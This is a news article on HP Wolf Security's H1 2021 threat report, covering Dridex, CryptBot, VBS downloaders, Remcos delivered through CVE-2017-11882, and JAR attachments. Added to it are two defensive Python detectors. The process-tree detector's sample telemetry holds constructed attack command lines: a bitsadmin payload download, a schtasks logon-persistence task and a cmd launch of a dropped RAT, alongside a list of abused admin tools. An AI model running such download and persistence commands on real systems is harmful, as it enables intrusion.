Hacking Tool Downloads Rise As Cybercrime Becomes “More Organized Than Ever”
There has been a significant increase in the frequency and sophistication of cybercrime activity, including a 65% rise in the use of hacking tools downloaded from underground forums and file-sharing websites between H2 2020 and H1 2021, according to HP’s latest Global Threat Insights report.
The researchers noted that the widely distributed hacking tools were surprisingly capable. For example, one tool solves CAPTCHA challenges using computer vision techniques, namely optical character recognition (OCR), to automate credential stuffing attacks against websites.
More generally, the report found that cybercrime is more organized than ever, with underground forums providing an ideal platform for threat actors to collaborate and share attack tactics, techniques and procedures.
“The proliferation of pirated hacking tools and underground forums allows previously low-level actors to pose serious business security risks,” says Dr Ian Pratt, Global Head of Security, Personal Systems, HP Inc.
“At the same time, users continue to fall prey to simple phishing attacks time and time again. Security solutions that keep IT departments ahead of future threats are critical to maximizing business protection and resiliency,” he said.
Notable threats isolated by HP Wolf Security include:
- Cybercrime collaboration opens the door to larger attacks against victims: Dridex affiliates sell access to breached organizations to other threat actors, who then distribute ransomware. Following the disruption of Emotet’s infrastructure in the first quarter of 2021, Dridex became the top malware family isolated by HP Wolf Security.
- Information stealers delivering more dangerous malware: CryptBot, historically used as an information stealer to harvest credentials from cryptocurrency wallets and web browsers, is now also used to deliver DanaBot, a banking trojan operated by organized crime groups.
- VBS downloader campaign targeting business executives: A multi-stage Visual Basic Script (VBS) campaign sends malicious ZIP attachments named after the executive it targets. It deploys a stealthy VBS downloader and then uses legitimate system administration tools to live off the land, persist on devices and spread malware.
- From application to infiltration: A résumé-themed malicious spam campaign targeted transportation, shipping, logistics and related companies in seven countries (Chile, Japan, UK, Pakistan, US, Italy and Philippines), exploiting a vulnerability in Microsoft Office to deploy the commercially available Remcos RAT and gain backdoor access to infected computers.
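The VBS campaign and the Office exploit chain above end the same way: a user-facing process (a script host, or a Word document that spawns a helper) starts built-in administration tools to fetch, persist and spread a payload. A process-tree check over process-creation telemetry catches both. The following is an added example written for this article, not code from HP or from the report; the event records are constructed, the LOLBin and Office process lists are the editor's assumptions, and the example assumes the Office chain passes through Equation Editor (EQNEDT32.EXE), which is the component behind CVE-2017-11882, the Office bug the report calls out later.

```python
"""Process-tree detection for script-host and Office-spawned LOLBin chains.

Added example (not HP Wolf Security code). Events are Sysmon Event ID 1 style
records: pid, parent pid, image path, command line. All events below are
constructed for illustration; the tool lists are assumptions, not from the report.
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Office processes, plus Equation Editor, which CVE-2017-11882 exploits run inside.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Children that Office legitimately starts (assumption; tune per environment).
OFFICE_CHILD_ALLOWLIST = {"splwow64.exe"}
# Legitimate admin tools commonly abused to download, persist and move laterally.
LOLBINS = {"powershell.exe", "bitsadmin.exe", "certutil.exe", "mshta.exe",
           "wmic.exe", "schtasks.exe", "regsvr32.exe", "rundll32.exe", "cmd.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_chains(events):
    """Map each pid to its ancestry as image basenames, oldest first."""
    by_pid = {e["pid"]: e for e in events}
    chains = {}
    for e in events:
        chain, seen, cur = [], set(), e
        while cur is not None and cur["pid"] not in seen:   # seen guards pid reuse loops
            seen.add(cur["pid"])
            chain.append(_basename(cur["image"]))
            cur = by_pid.get(cur["ppid"])
        chains[e["pid"]] = list(reversed(chain))
    return chains


def detect(events):
    """Return one alert per process that matches either chain pattern."""
    alerts = []
    chains = build_chains(events)
    for e in events:
        chain = chains[e["pid"]]
        me, ancestors = chain[-1], chain[:-1]
        if me in LOLBINS and any(a in SCRIPT_HOSTS for a in ancestors):
            rule = "script host spawning admin tool (VBS downloader pattern)"
        elif (any(a in OFFICE_APPS for a in ancestors)
              and me not in OFFICE_APPS and me not in OFFICE_CHILD_ALLOWLIST):
            rule = "Office process spawning non-Office child (document exploit pattern)"
        else:
            continue
        alerts.append({"pid": e["pid"], "rule": rule,
                       "chain": " > ".join(chain), "cmdline": e["cmdline"]})
    return alerts


# Constructed sample telemetry: one VBS chain, one Office chain, two benign processes.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\jdoe\Downloads\JaneDoe.vbs"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://example.invalid/p.dat C:\ProgramData\p.dat"},
    {"pid": 202, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc onlogon /tn Updater /tr "wscript.exe C:\ProgramData\u.vbs"'},
    {"pid": 300, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE resume.docx"},
    {"pid": 301, "ppid": 300, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"pid": 302, "ppid": 301, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c start C:\Users\jdoe\AppData\Roaming\rem.exe"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 401, "ppid": 400, "image": r"C:\Windows\System32\wscript.exe", "cmdline": "wscript.exe logon.vbs"},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"pid {a['pid']}: {a['rule']}\n    {a['chain']}\n    {a['cmdline']}")
```

The benign cases matter as much as the hits: an administrator running a script from an interactive shell (pid 401) produces no alert because the script host itself is not an admin tool, and Equation Editor started by Word (pid 301) is not flagged on its own, only what it spawns. In a real deployment the allowlist of Office children needs tuning against a baseline of the environment's own telemetry.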
The results are based on data from HP Wolf Security, which tracks malware within isolated micro-virtual machines to understand and capture a full chain of infection and help mitigate threats. By better understanding the behavior of malware in the wild, HP Wolf Security researchers and engineers are able to strengthen endpoint security protections and overall system resiliency.
“The cybercrime ecosystem continues to grow and transform, with more opportunities for small cybercriminals to connect with larger organized crime players and download advanced tools capable of bypassing defenses and breaching systems,” said Alex Holland, senior malware analyst at HP.
“We are seeing hackers adapting their techniques to generate greater monetization, selling access to organized crime groups so that they can launch more sophisticated attacks against organizations,” he said.
“Previously, malware strains like CryptBot would have posed a danger to users who use their PCs to store cryptocurrency wallets, but now they also pose a threat to businesses.
“We are seeing infostealers distributing malware exploited by organized crime groups that tend to favor ransomware to monetize their access.”
Other key findings from the report include:
- 75% of malware detected was sent via email, while web downloads were responsible for the remaining 25%. Threats downloaded using web browsers increased by 24%, in part due to users downloading hacking tools and cryptocurrency mining software.
- The most common email phishing lures were invoices and business transactions (49%), while 15% were responses to intercepted threads. Phishing lures mentioning COVID-19 were less than 1%, down 77% from H2 2020 to H1 2021.
- The most common type of malicious attachments were archive files (29%), spreadsheets (23%), documents (19%), and executable files (19%). Unusual archive file types such as JAR (Java Archive Files) are used to bypass detection and analysis tools and install malware easily obtained from underground markets.
- The report found that 34% of captured malware was previously unknown, down 4% from the second half of 2020.
- A 24% increase in malware that exploits CVE-2017-11882, a memory corruption vulnerability in the Equation Editor component of Microsoft Office (also reachable through Microsoft WordPad) that is commonly used to conduct fileless attacks.
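The point about JAR files and other unusual archive types is that extension-based filtering is what they defeat: a JAR is a ZIP container, so a scanner that trusts the .zip extension sees a harmless archive. The following is an added example for this article, not code from HP or the report. It classifies an attachment from its leading bytes and, for ZIP containers, from its member names, then compares the result with the claimed extension. The sample attachments are constructed in memory and are not real captures; the extension and risk tables are the editor's assumptions.

```python
"""Attachment triage by content rather than extension.

Added example (not HP Wolf Security code). Recognises JARs, macro-enabled
Office documents and executables regardless of the name they arrive under.
Samples at the bottom are constructed, not real malware.
"""
import io
import zipfile

MAGIC = [
    (b"MZ", "pe"),                                   # Windows executable
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),    # legacy .doc/.xls container
    (b"{\\rtf", "rtf"),                              # RTF, opened by Word and WordPad
    (b"%PDF", "pdf"),
]
# Content types an extension is allowed to carry (assumption; extend as needed).
EXPECTED = {
    "zip": {"zip"}, "jar": {"jar"}, "docx": {"ooxml"}, "docm": {"office-macro"},
    "xlsx": {"ooxml"}, "xlsm": {"office-macro"}, "doc": {"ole"}, "xls": {"ole"},
    "rtf": {"rtf"}, "pdf": {"pdf"}, "exe": {"pe"},
}
HIGH_RISK = {"jar", "pe", "office-macro"}   # block outright
REVIEW = {"ole", "rtf"}                     # legacy formats that carry exploit documents


def classify(data: bytes) -> str:
    """Derive a content type purely from bytes and container structure."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            return "zip-corrupt"
        if "META-INF/MANIFEST.MF" in names:          # a JAR is a ZIP with a manifest
            return "jar"
        if any(n.endswith("vbaProject.bin") for n in names):
            return "office-macro"
        if any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
            return "ooxml"
        return "zip"
    return "unknown"


def triage(filename: str, data: bytes) -> dict:
    """Compare claimed extension with real content and return a verdict."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    content = classify(data)
    reasons = []
    if content in HIGH_RISK:
        reasons.append(f"high-risk content: {content}")
    if ext in EXPECTED and content not in EXPECTED[ext]:
        reasons.append(f"extension .{ext} does not match content {content}")
    if len(parts) > 2 and parts[-2] in EXPECTED:     # e.g. statement.pdf.exe
        reasons.append("double extension")
    if reasons:
        verdict = "block"
    elif content in REVIEW:
        verdict = "review"
    else:
        verdict = "allow"
    return {"filename": filename, "content": content, "verdict": verdict, "reasons": reasons}


def _zip_bytes(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples: a JAR renamed to .zip, a macro document with a .docx name,
# a PE with a double extension, and a harmless ZIP.
SAMPLES = {
    "shipping_docs.zip": _zip_bytes({"META-INF/MANIFEST.MF": b"Main-Class: Loader\n",
                                     "Loader.class": b"\xca\xfe\xba\xbe"}),
    "invoice.docx": _zip_bytes({"[Content_Types].xml": b"<Types/>",
                                "word/document.xml": b"<w:document/>",
                                "word/vbaProject.bin": b"\x00"}),
    "statement.pdf.exe": b"MZ" + b"\x00" * 62,
    "photos.zip": _zip_bytes({"holiday.jpg": b"\xff\xd8\xff"}),
}


def run(samples=SAMPLES) -> dict:
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, r in run().items():
        print(f"{name:20} {r['content']:13} {r['verdict']:7} {'; '.join(r['reasons'])}")
```

The check deliberately never blocks on the extension alone: a renamed JAR is caught by its manifest, and a genuine .zip of photos passes. A gateway that only matched `*.jar` would have allowed the first sample through, which is exactly the evasion the report describes.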
“Cybercriminals easily bypass detection tools by simply fine-tuning their techniques,” says Holland.
“We have seen an increase in the number of malware distributed through uncommon file types, such as JAR files, which are probably used to reduce the chances of being detected by anti-malware scanners,” he explains.
“The same old phishing tricks are trickling down to victims, with transaction-themed lures that convince users to click on malicious email attachments, links and web pages.”
Pratt concludes, “As cybercrime takes hold and small players can easily obtain effective tools and monetize attacks by selling on access, there is no minor breach.
“The endpoint continues to be a priority for cybercriminals. Their techniques are becoming more sophisticated, so it’s more important than ever to have a complete and resilient endpoint infrastructure and cyber defense,” he says.
“This means using features like threat containment to defend against modern attackers, minimizing the attack surface by eliminating threats from the most common attack vectors: emails, browsers and downloads.”